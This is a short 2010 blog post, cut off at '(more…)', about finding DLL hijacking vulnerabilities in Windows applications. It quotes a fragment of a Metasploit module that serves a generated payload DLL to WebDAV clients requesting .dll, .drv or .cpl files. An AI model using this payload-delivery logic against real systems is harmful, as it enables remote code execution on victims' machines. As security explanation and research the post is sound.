Tools for search DLL Hijacking Vulnerabilities
Thursday, September 2nd, 2010More information about this vulnerability, we can find here:
[DLL Hijacking] Windows 7 and more application Remote code Exuction => metasplooit
Let us now look as vulnerable applications :D
Always in the above mentioned, I showed how you can exploit with Metasploit vulnerability, using webdav, even remotely.
L’exploit creato da HD moore, metaploit developer is very simple.
The code that interests us is:
if (request.uri =~ /\.(dll|dl|drv|cpl)$/i)
print_status("#{cli.peerhost}:#{cli.peerport} GET => DLL Payload")
return if ((p = regenerate_payload(cli)) == nil)
data = Msf::Util::EXE.to_win32pe_dll(framework, p.encoded)
send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })
return
end
(more…)







